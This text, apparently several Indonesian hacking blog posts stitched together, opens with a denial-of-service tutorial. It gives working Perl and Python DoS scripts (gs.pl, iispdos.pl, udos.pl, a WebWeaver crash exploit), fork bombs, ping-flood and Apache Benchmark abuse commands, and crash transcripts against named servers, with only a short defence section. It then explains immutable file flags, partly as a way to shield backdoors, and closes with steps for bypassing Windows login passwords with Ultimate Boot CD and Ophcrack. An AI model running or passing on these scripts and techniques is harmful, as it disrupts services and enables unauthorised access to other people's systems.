.o0 Motif penyerang melakukan Denial of Service

Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker dalam melakukan Denial of Service yaitu:

1. Status Sub-Kultural.
2. Untuk mendapatkan akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.

Satatus subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of Service merupakan aktifitas hacker diawal karirnya.

Alasan politik dan ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan serangan DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, komputer ini disebut 'zombie' dalam jargon.

Lebih relevan lagi, keisengan merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk mendapatkan program-program DoS, seperti nestea, teardrop, land, boink, jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of Service dengan sangat tepat, dan yang terpenting sangat mudah untuk melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell yang berupa ./nama_program argv argc ...


.o0 Denial of Sevice, serangan yang menghabiskan resource.

Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:

A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD

A. Swap Space

Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa serangan Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth

Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables

Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi memori kepada kernel juga merupakan target serangan yang sensitif. Kernel memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM

Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot.

E. Disk

Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD

Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan bekerja.


.o0 Teknik Melakukan Denial of Service

Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga tidak begitu menarik. Kita akan bahas tipe-tipe serangan DoS.

1. SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole' pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem.
2. Pentium 'FOOF' Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor yang digunakan yaitu pentium.
3. Ping Flooding
Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network). Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP. Varian dari serangan ini disebut "smurfing" (http://www.quadrunner.com/~chuegen/smurf.txt).

Serangan menggunakan exploits.

Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan fungsi search agar lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)
Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms. Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah membuat hang/blue screen of death pada komputer korban.
Cara penggunaan:
A. Dapatkan file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]
Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung kepada jenis sistem operasi dan konfigurasi server target (misalmya: blocking)
2. BONK/BOINK
Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT
3. Jolt
Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet yang tinggi sekali kepada korban.
4. NesTea
Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows versi awal. Versi improve dari NesTea dikenal dengan NesTea2
5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk (bonk.c)
6. Syndrop
Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target serangan adalah Linux dan Windows
7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini adalah Blue Screen of Death

Serangan langsung (+ 31337)

1. Ping Flood
Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran.
bash # ping -fs 65000 [ip_target]
2. Apache Benchmark
Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan) suatu web server, namun tidak tertutup kemungkinan untuk melakukan penyalahgunaan.
bash $ /usr/sbin/ab -n 10000 -c 300 \
http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
(diketik dalam 1 baris!)
Akan melakukan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket
Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah-pisah.

Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, seolah-olah server korban tewas.

Script gs.pl (gantung socket)

#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !

DoS-ing Apache lagi !!

Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.

1. Fork Bomb, habiskan RAM

#!/usr/bin/perl
fork while 1;

2. Habiskan CPU

#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Habiskan Memory

#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }

4. Serangan Input Flooding
Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat terjadi secara remote jika demon (server) tidak melakukan verifikasi input sehingga input membanjiri buffer dan menyebabkan program dihentikan secara paksa.

Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.

1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS

IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes, versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181

Script: iispdos.pl

#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;

print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# END.

2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net

Proof of Concept:

% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

wzdftpd crash setelah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : www.brswebweaver.com
BugTraqer : euronymous /F0KP

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org

Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command SELECT. Dampak dari serangan ini adalah berhentinya server dan harus di-restart secara manual.

Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------

Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat'


Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja - membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada komputer esekutor yang memiliki bandwidth lebar.

Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.

Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS. Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).

-- udos.pl --

#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# End.

-- udos.pl --

Skrip sederhana diatas hanya melakukan hubungan dengan server korban, lalu mengirimkan flood dan melakukan post testing. Dengan sedikit pemprograman anda dapat membuat sebuah 'Mass Flooder' atau 'Brute Force Flooder', tergantung pada kreatifitas anda !


.o0 Penanggulangan serangan Denial of Service

Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau bagaimana mudahnya melakukan input flooding dan membuat tool sendiri. Namun Denial of service adalah masalah layanan publik. Sama halnya dengan anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan 'menutup' toko anda - dan ini adalah cara paling efektif - namun jawaban kekanak-kanakan demikian tentu tidak anda harapkan.

1. Selalu Up 2 Date.
Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option untuk menolak cracker untuk mengakses system.
2. Ikuti perkembangan security
Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal. Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet' dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak - tidak tertutup kemungkinan untuk melakukan Denial of Service -. Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara langsung dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor atau melakukan up-date.
3. Teknik pengamanan httpd Apache.
+ Pencegahan serangan Apache Benchmark.
Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ). Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang admin harus teliti.

Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'. Jangan lupa juga menambah RAM.

4. Pencegahan serangan non elektronik.
Serangan yang paling efektif pada dasarnya adalah local. Selain efektif juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman, atau semua user adalah orang 'baik'. Pertimbangkan semua aspek. Anda bisa menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari admin dan user bersangkutan.


.o0 Penututp.

Berbicara masalah security merupakan hal yang mengasikkan. Teknik-teknik intrusi baru begitu unik dan sebagai seorang geek saya yakin 'keindahan pengetahuan diatas segalanya'. Anda tidak akan melakukan hal-hal bodoh seputar dokumen ini dan ingat selalu 'kita tidak pernah tahu segalanya'. Mulailah belajar, perhatikan dunia dan kuasai ! Anda akan terkagum, betapa indahnya semesta ini.

Terima kasih untuk anda semua telah membaca artikel ini - bahkan sampai baris ini :) -. Terima kasih untuk rekan-rekan echo-staff atas support selama ini. Untuk semua Computer Security Industries Indonesia, teruslah berjuang Amigo !! Computer Underground, hey nak, sudah saatnya belajar dan berhenti bermain. Semua teman-teman online TERIMA KASIH !!


"MEMBUAT SESUATU YANG TIDAK MUNGKIN MENJADI MUNGKIN"
"FRUZI ALBAR FRUZTECKER"
0

Immutable file, mungkin kamu pernah mendengarnya atau bahkan menggunakannya, atau malahan belum pernah dengar samasekali. Artikel ini akan membahas tentang seluk beluk immutable flag. Bagi yang sudah paham dan familier mungkin artikel ini hanya sebagai knowledge-refreshment, dan saya butuh masukkan apabila terdapat kesalahan atau kekurangan dalam membahasnya. Bagi yang belum pernah mendengar atau sudah tahu namun masih belum paham benar mudah2an artikel ini bermanfaat.

'immutable' adalah salah satu attribut yang terdapat dalam filesystem ext2 dan ext3 (file system yang banyak digunakan oleh Linux OS). Trus klo di benak kamu ada pertanyaan gini, "Apa sih gunanya attribut immutable itu?" atau gini "Attribut?? Kok saya gak liat tuh klo 'man chmod'??" Ada baiknya kamu baca terus artikel ini.

Immutable flag adalah salah satu attribut yang apabila sebuah file/direktori di set flagnya immutable maka tak seorangpun dapat memodifikasi, delete, rename, link, overwrite, append, dsb yang mengakibatkan file tsb termanipulasi datanya. Bahkan seorang root sekalipun tidak berguna pangkatnya. Wow....fantastis.

Eittt....script-kiddie jangan senang dulu. Jangan langsung nanya "klo gitu, backd00r gw gak bakalan bisa di del donG klo gw set immutable?". Maka jawabannya "Wrong-Fully Accused". Hehehe...... (aku jg script-kiddie :P~) Klo si root itu tau (admin/root yang baik pasti tau) immutable flag, maka ya tinggal tunggu tanggal 'rm -rf'nya aja. "Lah terus apa gunanya klo gitu?" tanya si script-kiddide tadi. Ya gunanya biar script-kiddie yang laen (yang gak ngerti immutable flag) gak ngacak-ngacak backd00r and xpl0its atau bahkan sniFFer kamu. Hihihih.....

Immutable itu tidak termasuk dalam atrributnya chmod, makanya kamu gak nemuin tentang ini klo 'man chmod'. Flag yang satu ini masuk kedalam attributnya 'chattr'. Coba deh 'man chattr'. Trus klo mau liat suatu file itu di set immutable atau nggak, tinggal 'lsattr' aja di shell kamu.

Berikut ini adalah contoh proofing-nya:

[root@tvm etc]# ls -al <--- root menemukan direktori yg mencurigakan di /etc drwxr-xr-x 5 root root 4096 Jan 6 19:19 .log/ [root@tvm etc]# rm -rf .log <--- root mencoba menghapusnya rm: cannot chdir from `.log/.' to `log': Not a directory <--- hehehe....gagal [root@tvm etc]# cd .log <--- root mencoba masuk ke direktori .log [root@tvm .log]# ls -a <--- root penasaran akan isinya total 23 drwxr-xr-x 5 root root 4096 Jan 6 19:19 ./ drwxr-xr-x 74 root root 8192 Jan 6 19:19 ../ -rwxr-xr-x 1 root root 171380 Aug 16 15:23 log [root@tvm .log]# rm log <--- root berniat menhapus isinya rm: remove write-protected regular empty file `log'? y rm: cannot remove `log': Operation not permitted <--- hiks....gagal lagi [root@tvm .log]# cp /dev/null log <--- root mengcopykan /dev/null ke isi file log cp: overwrite `log', overriding mode 0644? y cp: cannot create regular file `log': Permission denied <--- hiyaaa....gagal lagiii.... :) [root@tvm .log]# > log <--- root langsung pake kekerasan
bash: log: Permission denied <--- :P~ kasiannnn deh luuuuu....

[root@tvm .log]# ln log /root/log <--- root membuat hard link ke home dir nya
ln: creating hard link `/root/log' to `log': Operation not permitted <--- root pingsan hehehehe.....

[root@tvm .log]# lsattr <--- root dapat ide setelah tanya sana-sini
---i---------- ./log

[root@tvm .log]# chattr -i log <--- root mulai senyam senyum
[root@tvm .log]# rm -rf log <--- senyum root semakin lebar
[root@tvm .log]# cd .. <--- sambil tertawa girang dia ke dir /etc
[root@tvm etc]# rm -rf .log <--- there is no excuse my friend kata si root
[root@tvm etc]#


Hingga artikel ini dibuat, masih banyak attribut2 lain yang masih dalam tahap pengembangan di dalam ext filesystem. Keep open your eyes, your ears and your mind.

Buat para 'admin/root', ada baiknya untuk membuat beberapa file penting system anda menjadi immutable. Sehingga script-kiddies yang masuk ke box anda tidak dapat menjalankan 'rootkits' yang umumnya dapat merusak system anda. Karena banyak sekali script-kiddies yang hanya taunya sekedar menjalankan 'rootkits' saja bukan memahami benar bagaimana cara kerja 'rootkits' itu sehingga mereka bisa mendapatkan akses 'r00t'.

Sekian artikel saya ini (masih dalam tahap belajar). Knowledge is belong to the world. So, share it d00d. Keep the Open-Source spirit UP. Any advices are welcome to fruziwall.blogspot.com
1

Ternyata kawan banyak sekali cara untuk hack tersebut, aku juga gak nyangka dan baru tahu sekarang hehehe... Ada 2 cara lagi yang akan saya paparkan di posting ini, yaitu cara hack password login Windows menggunakan Ultimate Boot CD dan Ophcrack Live CD. Maaf kalo bagi Anda yang sudah tidak asing lagi dengan nama2 tersebut, tapi saya ini baru mendengarnya dan trik ini saya dapatkan dari blog ini. Oke deh agar tidak penasaran lagi kita langsung aja ke cara2nya :

1. Cara Hack Password Login Windows Menggunakan Ultimate Boot CD
Silahkan download iso Ultimate Boot CD kemudian burn ke CD. Kemudian ikuti langkah-langkah dibawah ini :

(1) Masukkan Ultimate Boot CD dan kemudian klik Start> Program> Password Tools> NTWPEdit.

(2) Setelah kotak dialog muncul, klik Tombol (Re)open dan akan menampilkan nama pengguna (user) yang ada pada Windows.

(3) Klik pengguna yang sesuai dan klik tombol Change password untuk mengubah Sandi (password).

(4) Masukkan password baru dan ulangi ketik untuk memverifikasinya dan restart komputer Anda.

Password sudah diatasi.

2. Cara Hack Password Login Windows Menggunakan Ophcrack Live CD
Lupa udah merupakan sifat manusia. Jika lupa password komputer, bisa jadi petaka. Akan banyak pekerjaan yang tertunda. Akan banyak data yang tidak bisa dibuka. Sebenarnya banyak cara membuka password pada Windows. Hanya saja caranya bermacam-macam. Windows XP sendiri sudah menyediakan fasilitas ini, Tetapi proses pembuatan rescue disknya dilakukan disaat kita masih ingat dengan passwordnya. Kita dapat menggunakan aplikasi lain (3rd Party Software). Sebut saja OphCrack. OphCrack merupakan aplikasi yang bersifat free alias gratis yang khusus mengcrack windows password.

Ophcrack memiliki 2 versi : Versi LiveCD dan Versi Instalasi. Untuk versi LiveCD berupa Sistem Operasi. Kita tinggal mendownload file ISO Imagenya dan di burning ke CD. Nah untuk versi instalasi harus diinstalkan ke PC dengan mendukung berbagai platform seperti Windows, Unix/Linux, dan Mac OS.

Adapun fitur dari Ophcrack dikutip dari Situs resminya adalah :

* Runs on Windows, Linux/Unix, Mac OS X, …
* Cracks LM and NTLM hashes.
* Free tables available for Windows XP and Vista.
* Brute-force module for simple passwords.
* LiveCD available to simplify the cracking.
* Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
* Free and open source software (GPL).

Cara menggunakannya cukup mudah. Kalo kita menggunakan Live CD, tentu saja harus sudah diburning ke CD. Kemudian pastikan boot order pada bios anda sudah di set ke CD. Masukkan CD dan ikuti petunjuk yang ditampilkan pada layar.

Untuk Versi instal silahkan di download aplikasi sesuai dengan OS yang digunakan. Kemudian lakukan instalasi sesuai petunjuk. Setelah selesai jalankan aplikasi seperti menjalankan aplikasi lainnya.

Source